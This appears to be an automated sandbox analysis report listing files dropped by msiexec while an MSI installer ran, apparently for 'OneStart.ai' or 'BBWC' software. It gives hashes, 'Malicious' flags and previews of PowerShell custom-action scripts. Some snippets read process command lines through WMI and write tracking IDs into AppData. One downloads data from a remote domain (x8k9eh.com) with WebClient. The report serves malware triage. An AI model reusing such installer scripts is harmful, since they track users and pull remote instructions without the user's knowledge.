                      SHA-512:1EE8C84D07D09922A2C32AABC40B1DCF985AA098232375B7DCCF473C8E50EDD712C77BB700216FD4DDCD2245EDCF10A2BBF6FFDED286434554FF4BFDD08960FF
                      Malicious:false
                      Reputation:low
                      Preview:FHN :<->: 44882564..PRODUCT_TYPE :<->: PDF..
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):5024
                      Entropy (8bit):3.678892613327007
                      Encrypted:false
                      SSDEEP:
                      MD5:8B719EA0AEB5E3AE6B49FCE3011C006D
                      SHA1:9E91093AC544D9EC3BA339B498D84A30EBDA3BA8
                      SHA-256:F053E3E2A74ED1234F11C6E319D9B114C81203129E6F2A37A3CF1062780326B8
                      SHA-512:10FCA776F0655A2A251AD9DEE0069D4799D1F6AD23F57529AFE17DB7270FEAE06C64871298E70D752227AD850BA86E53AB1B3787C00210D0BFC3A957F19F6DEA
                      Malicious:false
                      Reputation:low
                      Preview:# Block for declaring the script parameters...Param()....# Your code goes here...$appName="BBWC"..$version="1.22.1002.32780"....function ConvertTo-Json20([object] $item){..    add-type -assembly system.web.extensions..    $ps_js=new-object system.web.script.serialization.javascriptSerializer..    return $ps_js.Serialize($item)..}....function ConvertFrom-Json20([object] $item){ ..    add-type -assembly system.web.extensions..    $ps_js=new-object system.web.script.serialization.javascriptSeriali
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):5642
                      Entropy (8bit):2.3574704793225054
                      Encrypted:false
                      SSDEEP:
                      MD5:4A85A32C37CE98C707FD64EDAFBC4B05
                      SHA1:5B27460643A1AFDC2D3D53EF163A8FBD3D3DFAF2
                      SHA-256:D772BF6FD75E4019BD9AA34DFACB5A47939184114530FF3F554D14C2ACE0AB57
                      SHA-512:5E55071E6E4DBF62C18F725E6825420EE64C7E8198376C70FD4AEAB04CCE636D69A8084936F20376B1E73B595B99395A045809829BF2A82313FCD2A31A781E9E
                      Malicious:false
                      Reputation:low
                      Preview:..t.r.y. .{. . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..... . . . . . .$._.m.s.i.P.r.o.p.O.u.t.F.i.l.e. .=. .'.C.:.\.U.s.e.r.s.\.a.l.f.r.e.d.o.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.m.s.i.1.2.8.D...t.m.p...t.x.t.'. . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .$._.i.s.T.e.s.t. .=. .$.f.a.l.s.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . .....F.u.n.c.t.i.o.n. .A.I._.G.e.t.M.s.i.P.r.o.p.e.r.t.y.(.[.s.t.r.i.n.g.]. .$.n.a.m.e. .=. .$.(.t.h.r.o.w. .'.A.I._.G.e.t.M.s.i.P.r.o.p.e.r.t.y. .r.e.q.u.i.r.e.s. .p.r.o.p.e.r.t.y. .n.a.m.e.'.).,. ..... . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .$.t.e.s.t.V.a.l.u.e. .=. .$.n.u.l.l.). . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .....{. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..... . .i.f.
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):1336
                      Entropy (8bit):3.6181563021973653
                      Encrypted:false
                      SSDEEP:
                      MD5:AD91D0697201B69585048FD6B62F02A3
                      SHA1:7CEADC7A14822DE76E68CB92EA12A2F7F8B73FBB
                      SHA-256:DE4187554DB21342218B87785B0DBDCD0A63F02BAB9A0E3BA829588A21D47C3C
                      SHA-512:FB058624A14B81E8738E439966413B2B97FD0284FAF321A202265794FCD6D7F771EDD15D7524C5EFB56E23115D2490772A24CCA0EAE2240F16115FC713286C59
                      Malicious:false
                      Reputation:low
                      Preview:# Block for declaring the script parameters...Param()....# Your code goes here...$regex = '[^_\s\/\\]+_(\w+)'..Get-WmiObject Win32_Process -Filter "name = 'msiexec.exe'" | Where { $_.CommandLine -match $regex }..if ($Matches) {..    $flowHelperId = $Matches[1]..    echo $flowHelperId....AI_SetMsiProperty FHN $flowHelperId..}....$flowhelperid = AI_GetMsiProperty FHN....$dir = "$env:APPDATA/BBWC"..if(!(Test-Path -Path $dir )){..    New-Item -ItemType directory -Path $dir..}..$FileName = "$dir/int
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):5638
                      Entropy (8bit):2.3542282613555026
                      Encrypted:false
                      SSDEEP:
                      MD5:CB1A70F59E2526EB2038DD1EC0E97CA4
                      SHA1:1D446829FF12E46A68E8A601C96F77C0770042E7
                      SHA-256:3B8F548E606DD1BBCB29CEC760BBA871F79E53847F67019D0EC2503C1B4F6B9C
                      SHA-512:106CA527C3417AE06BC55718B195109DD453326C5101764E7557FF2EA78A16CAD0001F98FE28F5CC5FF7650ABCDD5B3A27AFAAEBA8EC25CB0C0C35E8C8ECD6ED
                      Malicious:false
                      Reputation:low
                      Preview:..t.r.y. .{. . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..... . . . . . .$._.m.s.i.P.r.o.p.O.u.t.F.i.l.e. .=. .'.C.:.\.U.s.e.r.s.\.a.l.f.r.e.d.o.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.m.s.i.1.3.D...t.m.p...t.x.t.'. . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .$._.i.s.T.e.s.t. .=. .$.f.a.l.s.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . .....F.u.n.c.t.i.o.n. .A.I._.G.e.t.M.s.i.P.r.o.p.e.r.t.y.(.[.s.t.r.i.n.g.]. .$.n.a.m.e. .=. .$.(.t.h.r.o.w. .'.A.I._.G.e.t.M.s.i.P.r.o.p.e.r.t.y. .r.e.q.u.i.r.e.s. .p.r.o.p.e.r.t.y. .n.a.m.e.'.).,. ..... . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .$.t.e.s.t.V.a.l.u.e. .=. .$.n.u.l.l.). . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .....{. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..... . .i.f. .
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):5642
                      Entropy (8bit):2.357597588880846
                      Encrypted:false
                      SSDEEP:
                      MD5:FFFD8A43734A2C4E1080F26300F10E06
                      SHA1:2C37F8FE754FC0DF353E2E2A81736263780596CE
                      SHA-256:C6BA2D93FD8128B2D5E366991A18822641A3C351448077DC2423AFDE9D75D5C2
                      SHA-512:CC96661C71843C7752E797CF684737C082EBE0E88DEBCE95B18E6E70D82FC9A7F014DB5F07729D68157EFA2E29F8625C81D8E640362FC2D28553C7C744D85331
                      Malicious:false
                      Reputation:low
                      Preview:..t.r.y. .{. . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..... . . . . . .$._.m.s.i.P.r.o.p.O.u.t.F.i.l.e. .=. .'.C.:.\.U.s.e.r.s.\.a.l.f.r.e.d.o.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.m.s.i.3.3.7.C...t.m.p...t.x.t.'. . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .$._.i.s.T.e.s.t. .=. .$.f.a.l.s.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . .....F.u.n.c.t.i.o.n. .A.I._.G.e.t.M.s.i.P.r.o.p.e.r.t.y.(.[.s.t.r.i.n.g.]. .$.n.a.m.e. .=. .$.(.t.h.r.o.w. .'.A.I._.G.e.t.M.s.i.P.r.o.p.e.r.t.y. .r.e.q.u.i.r.e.s. .p.r.o.p.e.r.t.y. .n.a.m.e.'.).,. ..... . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .$.t.e.s.t.V.a.l.u.e. .=. .$.n.u.l.l.). . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .....{. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..... . .i.f.
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):5642
                      Entropy (8bit):2.3582950487237615
                      Encrypted:false
                      SSDEEP:
                      MD5:8C60053032818D8A50C593EE09B3F076
                      SHA1:C65E7D80B80009BA9E164569504016073F4E0133
                      SHA-256:6407F2C3C706A08A20584D2EFFAA90CF0D9CEFB1F040DA908B4992DEDE5AECC1
                      SHA-512:DEB1A604F02BC1461C28CD25DB5441AFB28594B3974A5CCF0BB024873692165A67DABE578D9DF8ECBBEF36453AEDED82635A74FC3F8CF4D6389783FE588D7773
                      Malicious:false
                      Reputation:low
                      Preview:..t.r.y. .{. . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..... . . . . . .$._.m.s.i.P.r.o.p.O.u.t.F.i.l.e. .=. .'.C.:.\.U.s.e.r.s.\.a.l.f.r.e.d.o.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.m.s.i.5.F.3.4...t.m.p...t.x.t.'. . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .$._.i.s.T.e.s.t. .=. .$.f.a.l.s.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . .....F.u.n.c.t.i.o.n. .A.I._.G.e.t.M.s.i.P.r.o.p.e.r.t.y.(.[.s.t.r.i.n.g.]. .$.n.a.m.e. .=. .$.(.t.h.r.o.w. .'.A.I._.G.e.t.M.s.i.P.r.o.p.e.r.t.y. .r.e.q.u.i.r.e.s. .p.r.o.p.e.r.t.y. .n.a.m.e.'.).,. ..... . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .$.t.e.s.t.V.a.l.u.e. .=. .$.n.u.l.l.). . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .....{. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..... . .i.f.
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):2220
                      Entropy (8bit):3.635697436711596
                      Encrypted:false
                      SSDEEP:
                      MD5:7F2461D0280157C331198A9B44846575
                      SHA1:63DE943DA568676BBCF0D1DFAAA2E7F3CBDE23B9
                      SHA-256:887C826559C568517E7CE16848EF1B864F52291F81319BD52D9728E439047B36
                      SHA-512:69DDE45FFF54680E9E08A105AA4CDDC1BB451050D2D5AAFA19060615172AF42BA78F81BE5E935E08A729E7C638C3715CBA5A6455FDBE7A389D3635F3191D7233
                      Malicious:false
                      Reputation:low
                      Preview:
                        # Block for declaring the script parameters.
                        Param($version)

                        function ConvertTo-Json20([object] $item){
                            add-type -assembly system.web.extensions
                            $ps_js=new-object system.web.script.serialization.javascriptSerializer
                            return $ps_js.Serialize($item)
                        }

                        function ConvertFrom-Json20([object] $item){
                            add-type -assembly system.web.extensions
                            $ps_js=new-object system.web.script.serialization.javascriptSerializer

                            #The comma operator is the array construction operat
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):5692
                      Entropy (8bit):2.381480633865662
                      Encrypted:false
                      SSDEEP:
                      MD5:265A8E9D83AFB2027168298BBEE18F34
                      SHA1:58E4C6E6B1CE4C1BC853DAC41A76F5BD897080DB
                      SHA-256:5AC8412E10FC7171E97BD9ECC0FB4EBB2A5B15BC1FC3BC74410F41FBD13EFFB4
                      SHA-512:D30DF22174DEEB50E51D357FC48EA0706C1020EAA10C0EBECDC4EB0DA2995D81AD09796077A7836FA896AB3840E983006E9365AF9CBA596F351FF0D56C4B86E6
                      Malicious:false
                      Reputation:low
                      Preview:
                        try {
                              $_msiPropOutFile = 'C:\Users\alfredo\AppData\Local\Temp\msi6892.tmp.txt'
                              $_isTest = $false
                        Function AI_GetMsiProperty([string] $name = $(throw 'AI_GetMsiProperty requires property name'),
                                                      $testValue = $null)
                        {
                          if
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):4196
                      Entropy (8bit):3.697596637267505
                      Encrypted:false
                      SSDEEP:
                      MD5:E203AE448BE712CF9041D52174E014C2
                      SHA1:4E4033E1E6C93B812B7C50CFF89EAF6B929990D3
                      SHA-256:A76FF24C6465EDD9A6640982A05433FCC7FD95A2F9FD4A078870973A57D52923
                      SHA-512:BD5149BA63FF51AE7F18B5A2A22C3AD10B35F5D6A9705137ABEE2264329C5BC9E07EF6B41DC1885C18A221E8A39005270AA4316ECF7EEACB28C83A80A095A4F1
                      Malicious:false
                      Reputation:low
                      Preview:
                        # Block for declaring the script parameters.
                        Param()

                        $appName="BBWC"
                        $version="1.22.1002.32780"
                        $domain="x8k9eh.com"

                        function ConvertTo-Json20([object] $item){
                            add-type -assembly system.web.extensions
                            $ps_js=new-object system.web.script.serialization.javascriptSerializer
                            return $ps_js.Serialize($item)
                        }

                        function ConvertFrom-Json20([object] $item){
                            add-type -assembly system.web.extensions
                            $ps_js=new-object system.web.script.serialization.javascriptSerialize
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):5642
                      Entropy (8bit):2.35849754838081
                      Encrypted:false
                      SSDEEP:
                      MD5:3A35AFBD294E740B36BC30B8ACEFD2FF
                      SHA1:7BBE43D74D47C12861778A8647CF7F1561754B57
                      SHA-256:7F788FC20A6F3E3749A10AE74E5781E051708401F7200F4F260E7278E6B95A33
                      SHA-512:35F88AEA2BC65C799ED2C130E11EB6D8B73120AEE5DC8EEA9BF95D7CAE06F021EC9245F9791021D600412A11DB556F7F720B1F607DAA9A5761394B64E59292EB
                      Malicious:false
                      Reputation:low
                      Preview:
                        try {
                              $_msiPropOutFile = 'C:\Users\alfredo\AppData\Local\Temp\msi7051.tmp.txt'
                              $_isTest = $false
                        Function AI_GetMsiProperty([string] $name = $(throw 'AI_GetMsiProperty requires property name'),
                                                      $testValue = $null)
                        {
                          if
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):5642
                      Entropy (8bit):2.3588051232644522
                      Encrypted:false
                      SSDEEP:
                      MD5:6FF8A567B25616AEF9DE6C23EAE22565
                      SHA1:039567F6D7FC8D5955B0C0C8C7FB9F4380322312
                      SHA-256:44BD0922D710D5F5466E14C5B73ACC44E831A54A149C15A9B990A0C3CA9FAC75
                      SHA-512:77D26CB167F99F461FE66E5507C7B73E81ED56E8ACB7E23A4F928BEC8D048D985E234F04C37B025C1071537821A6BD4E18994F36CA6FD4497F0A2E7BA7A85654
                      Malicious:true
                      Reputation:low
                      Preview:
                        try {
                              $_msiPropOutFile = 'C:\Users\alfredo\AppData\Local\Temp\msi9360.tmp.txt'
                              $_isTest = $false
                        Function AI_GetMsiProperty([string] $name = $(throw 'AI_GetMsiProperty requires property name'),
                                                      $testValue = $null)
                        {
                          if
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):5782
                      Entropy (8bit):2.4085217459459165
                      Encrypted:false
                      SSDEEP:
                      MD5:9B5588051AF42445EA522D2CF91B2059
                      SHA1:AA6FD6961BBB8C39F6EB01B074D5CB2A722354F5
                      SHA-256:A4A7DDC845F59AC9A79962C68FE2151B4C4896A6FDD29C1E7CFA799BE2A5369D
                      SHA-512:AFC0E1B366E6C8B71A34C9A67D0A9A8F5FE7AC1488710DCA9E9324DCB9594801BFC3FD42D91C29A5C7A772EE1394544D3BB5DA18CC3882EE69D56E00152814F3
                      Malicious:false
                      Reputation:low
                      Preview:
                        try {
                              $_msiPropOutFile = 'C:\Users\alfredo\AppData\Local\Temp\msi9D79.tmp.txt'
                              $_isTest = $false
                        Function AI_GetMsiProperty([string] $name = $(throw 'AI_GetMsiProperty requires property name'),
                                                      $testValue = $null)
                        {
                          if
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):792
                      Entropy (8bit):3.5290764092640097
                      Encrypted:false
                      SSDEEP:
                      MD5:92473D7D4483C2FA65D0DBFA20D2FA46
                      SHA1:5EC15FEDE8E9B2DE9B238ECDBA3D2337EDCBE12F
                      SHA-256:CC8CD79CF2F67AF72404162CCE052EF618AF94B7223CA780963562A6D3593F53
                      SHA-512:62BEBBDC1B74D003D3936641C598AE7910C722C923693A494A75623A464995908282893C85A6E9BACEDB98A473FF37FFF4F80D86DBCF6A3287455450B17FC256
                      Malicious:false
                      Reputation:low
                      Preview:
                        # Block for declaring the script parameters.
                        Param()

                        # Your code goes here.
                        $lsp = "$env:APPDATA/OneStart/"
                        if(!(Test-Path -Path $lsp )){
                            New-Item -ItemType directory -Path $lsp
                        }
                        $lsfn = "intermediate.dat"
                        $lsf = "$lsp/$lsfn"
                        if (Test-Path $lsf)
                        {
                          Remove-Item $lsf
                        }
                        $flowHelperId = AI_GetMsiProperty FHN
                        $lsf = New-Item -Path $lsf -ItemType "file" -Value $flowHelperId
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):5642
                      Entropy (8bit):2.356273957008397
                      Encrypted:false
                      SSDEEP:
                      MD5:96C23A9121C507EB316A9343071BDFBF
                      SHA1:04B15BE640D45F36ED75601029B8F0395AE3535E
                      SHA-256:CEA354CECD3EFDF1635C0F4298FE5F8185C0C3AAC6C9820B26E32DE702FF268F
                      SHA-512:581D0F7DEDBCAF018F7D567C1689E80CE4DD49818A952D9C112C25451F8F518427258A8DCDA4511481999E72708181DB672A79686E28349EAD926AF6B315E442
                      Malicious:false
                      Reputation:low
                      Preview:
                        try {
                              $_msiPropOutFile = 'C:\Users\alfredo\AppData\Local\Temp\msiA3CF.tmp.txt'
                              $_isTest = $false
                        Function AI_GetMsiProperty([string] $name = $(throw 'AI_GetMsiProperty requires property name'),
                                                      $testValue = $null)
                        {
                          if
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):1650
                      Entropy (8bit):3.6141393589699744
                      Encrypted:false
                      SSDEEP:
                      MD5:2C31B152FEB1E7EB93FB722A1D74CE69
                      SHA1:5744809E9A63E2E5DF92B07F1C44E3B40C0B5A48
                      SHA-256:55D3C74653220AF13F8DB20084925C0DDE3A817A41257F6688DF17C571158B75
                      SHA-512:9631C366FC5FB82E586E12085AB9C96FBB5551AF837D39C20513216706C4510A99126FC36B073EE996FE27BCA0550FB6FA54EB1AA14086BFF99E0A277616F9CA
                      Malicious:false
                      Reputation:low
                      Preview:
                        # Block for declaring the script parameters.
                        Param()

                        # Your code goes here.
                        $lsp = "$env:LOCALAPPDATA/OneStart.ai/"
                        if(!(Test-Path -Path $lsp )){
                            New-Item -ItemType directory -Path $lsp
                        }
                        $lsp = "$env:LOCALAPPDATA/OneStart.ai/OneStart"
                        if(!(Test-Path -Path $lsp )){
                            New-Item -ItemType directory -Path $lsp
                        }
                        $lsp = "$env:LOCALAPPDATA/OneStart.ai/OneStart/Update"
                        if(!(Test-Path -Path $lsp )){
                            New-Item -ItemType directory -Path $lsp
                        }
                        $lsfn = "intermediate.dat"
                        $lsf =
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):5642
                      Entropy (8bit):2.3574264080577967
                      Encrypted:false
                      SSDEEP:
                      MD5:F2458DD86096F1C600CEC7F5FFC882ED
                      SHA1:46AF6FB958340936DA6FD0587FEFE4FEEF1F49B2
                      SHA-256:4221E49EB3860A1A7EFE583E1C246DF29B414918E11D6C0576593369A9C1918F
                      SHA-512:851315EFE6B6FCEA3A483C10C4C011B9E532CF519C62E2D74ED8D6666F88BD7D63241876899E8827808E711A865657C941A7D87F6979BA1E22FFE54E46AFFFC4
                      Malicious:false
                      Reputation:low
                      Preview:
                        try {
                              $_msiPropOutFile = 'C:\Users\alfredo\AppData\Local\Temp\msiB4EA.tmp.txt'
                              $_isTest = $false
                        Function AI_GetMsiProperty([string] $name = $(throw 'AI_GetMsiProperty requires property name'),
                                                      $testValue = $null)
                        {
                          if
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):2222
                      Entropy (8bit):3.6358738026260666
                      Encrypted:false
                      SSDEEP:
                      MD5:EB1A87309734AE67580AAD5EED063B67
                      SHA1:4CDFC9A7720B21DF4D20F95BE269D364B5DC033B
                      SHA-256:C0369FC871EA7D4DA4609FB72DBB635BAB035476C6BFF9595E2951B2C4AB69CC
                      SHA-512:6537161CE1EEC201A9DF3A4CC353F453DF339130DDA89463DADA1C2C76E7C4F09374ACE5998A2F6E2FA4C17F61C385B1CA3FE6A43AA1DD0CD3CC71559CA3364E
                      Malicious:false
                      Reputation:low
                      Preview:
                        # Block for declaring the script parameters.
                        Param($version)

                        # Your code goes here.
                        function ConvertTo-Json20([object] $item){
                            add-type -assembly system.web.extensions
                            $ps_js=new-object system.web.script.serialization.javascriptSerializer
                            return $ps_js.Serialize($item)
                        }

                        function ConvertFrom-Json20([object] $item){
                            add-type -assembly system.web.extensions
                            $ps_js=new-object system.web.script.serialization.javascriptSerializer

                            #The comma operator is the a
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):5692
                      Entropy (8bit):2.378718927875605
                      Encrypted:false
                      SSDEEP:
                      MD5:CAB1D6F1344B6CB51ADD04F612AA1965
                      SHA1:4FD358DED9CBED52E54174647367C9A124DC8741
                      SHA-256:A02F1DA65F59B9F7BEC674437A450E669D37C1EB4A5508F52710EA84BABD0FFF
                      SHA-512:BEFDA836C342BFB069DC531F0B99EFF7607E5D4792074AC0278584FDF1C0ECFF9C194375755017EE0183D8AFE4F8BFFBBED115AE581B1472BAA46EB1804E80EC
                      Malicious:false
                      Reputation:low
                      Preview:
                        try {
                              $_msiPropOutFile = 'C:\Users\alfredo\AppData\Local\Temp\msiC2EB.tmp.txt'
                              $_isTest = $false
                        Function AI_GetMsiProperty([string] $name = $(throw 'AI_GetMsiProperty requires property name'),
                                                      $testValue = $null)
                        {
                          if
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):1878
                      Entropy (8bit):3.6357593713249186
                      Encrypted:false
                      SSDEEP:
                      MD5:40F4F724022CCF94946155CE0E74D9EE
                      SHA1:C9A1785771A850B86FBCAAF5EE34104F5F965914
                      SHA-256:B7CF422B7B3A62F7A54B8831EDD980B52D59174DF539BCC1FEB2D19206141198
                      SHA-512:A48DE7AC4748ED288B1A95C2DBDC837035D677250BB89D3980B9CCA89C98B67D480A12F544E5AB337DEA7F80053113B00D639F2CC53EEA8310D54AC2FA8C0D46
                      Malicious:false
                      Reputation:low
                      Preview:
                        # Block for declaring the script parameters.
                        Param($domain, $version, $appName, $fid)
                        # Your code goes here.
                        function ConvertTo-Json20([object] $item){
                            add-type -assembly system.web.extensions
                            $ps_js=new-object system.web.script.serialization.javascriptSerializer
                            return $ps_js.Serialize($item)
                        }
                        function CheckInstalled
                        {
                            $ret = '0'
                            Try{
                                $ret = Get-ItemPropertyValue -Path "HKCU:\SOFTWARE\OneStart.ai\OneStart Software" -Name "Version"
                            }
                            Catch{
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):5782
                      Entropy (8bit):2.4074965823690704
                      Encrypted:false
                      SSDEEP:
                      MD5:7490B8AE2B0C6FFBE16D7A4F0FD02C9B
                      SHA1:ED1F0B619449C34A23829B63CAE35B57258339B4
                      SHA-256:97650D0AF58E6DF61A0E8E4EF0201F5592DAC23430E81EE01AC98D568C1BEBD2
                      SHA-512:C98908E4C971A6F64DE4B3739BFAD342A677103753254E790078958677B9C5F5E68AE668A36833149B3696E885C0B2254BEBC349F0596D7C60DA697D5254774A
                      Malicious:false
                      Reputation:low
                      Preview:
                        try {
                              $_msiPropOutFile = 'C:\Users\alfredo\AppData\Local\Temp\msiC7E9.tmp.txt'
                              $_isTest = $false
                        Function AI_GetMsiProperty([string] $name = $(throw 'AI_GetMsiProperty requires property name'),
                                                      $testValue = $null)
                        {
                          if
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):5682
                      Entropy (8bit):2.3744496388990632
                      Encrypted:false
                      SSDEEP:
                      MD5:1DAF1E129E850B56B5F0AE5312949EDE
                      SHA1:1A24DAD392BB114FC2D1CAC35CC467AFD55D36BB
                      SHA-256:F297A729A5B91B080260C6541867FAF91C9D58855F973553EFD6302A7FCAEF54
                      SHA-512:31888376EA8EB3A0139C6870EB69083E7D415E83A8598D8D056D38BAD2246C0F6055BA522EE44436663A1A130F8901BC73A47A59C873DD4568AF91CCF4A801FF
                      Malicious:false
                      Reputation:low
                      Preview:
                        try {
                              $_msiPropOutFile = 'C:\Users\alfredo\AppData\Local\Temp\msiDFB6.tmp.txt'
                              $_isTest = $false
                        Function AI_GetMsiProperty([string] $name = $(throw 'AI_GetMsiProperty requires property name'),
                                                      $testValue = $null)
                        {
                          if
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):846
                      Entropy (8bit):3.61636013833285
                      Encrypted:false
                      SSDEEP:
                      MD5:E945E427989079DE85CB6825100B7925
                      SHA1:15CFD7A1499097475123EFEFF20FFC68A0BFB309
                      SHA-256:81D4021180BB62D1FE7325060A79C48FBEADC4C7CEED12BB561A2EE9D50EBC03
                      SHA-512:4B7BB1AFAB16953F95B12911D060018C64766F87C7D4752F58C783A17C0970251EC951C8A0390D6E5E5DEDB4ECAD57F249387198AFC788CB6973DED06A5F7043
                      Malicious:false
                      Reputation:low
                      Preview:
                        # Block for declaring the script parameters.
                        Param($domain)

                        # Your code goes here.
                        $flowHelperId = AI_GetMsiProperty FHN

                        $url = "https://$domain/api/gmsipt?fhnid=$flowHelperId"
                        $web = New-Object System.Net.WebClient
                        $response = $web.DownloadString($url)
                        $json = ConvertFrom-Json $response
                        $product = $json.Product
                        if ($product -ne $null -and $product -ne "") {
                            AI_SetMsiProperty PRODUCT_TYPE $product
                        }
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):5682
                      Entropy (8bit):2.3741567221500453
                      Encrypted:false
                      SSDEEP:
                      MD5:1702201E14011FEBDD2EC11C7930FC02
                      SHA1:806BD623C35DA8DE76D197F98DE5F99A90730EE5
                      SHA-256:63DBC68BE2725B241168D7ECE8D1D58CE1AB338874102AC5907EE1E778AFF524
                      SHA-512:7819FB22CE7C10716791D32E4B9725960C1D302D3AE154A7B0405CCAC55AECD1ED490B29282CA0AFB41C69CE474E115AF606A7E281F5D3143248F413E6A19A1E
                      Malicious:false
                      Reputation:low
                      Preview:
                        try {
                              $_msiPropOutFile = 'C:\Users\alfredo\AppData\Local\Temp\msiE393.tmp.txt'
                              $_isTest = $false
                        Function AI_GetMsiProperty([string] $name = $(throw 'AI_GetMsiProperty requires property name'),
                                                      $testValue = $null)
                        {
                          if
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:MS Windows icon resource - 6 icons, 256x256 with PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced, 32 bits/pixel, -128x-128, 32 bits/pixel
                      Category:dropped
                      Size (bytes):118877
                      Entropy (8bit):5.455618596473384
                      Encrypted:false
                      SSDEEP:
                      MD5:ADB96146B25696687F9B8D56B4E2BA4B
                      SHA1:88892D8F897701C321D052DBD6FCED766EABF4FF
                      SHA-256:F5B87A47916624FA89A0B2A2E9B4F0FD0910D83EB1AF8894AE29315D20BB3D45
                      SHA-512:1C160EA3ED77B01627F396C09F611026B649E825B1FE6FB3B452E22BCA360DFD470F5A67D08FDC3D598E690C9393491E3DEC363019D7B348A7A20BA6E5ED782A
                      Malicious:false
                      Reputation:low
                      Process:C:\Windows\SysWOW64\msiexec.exe
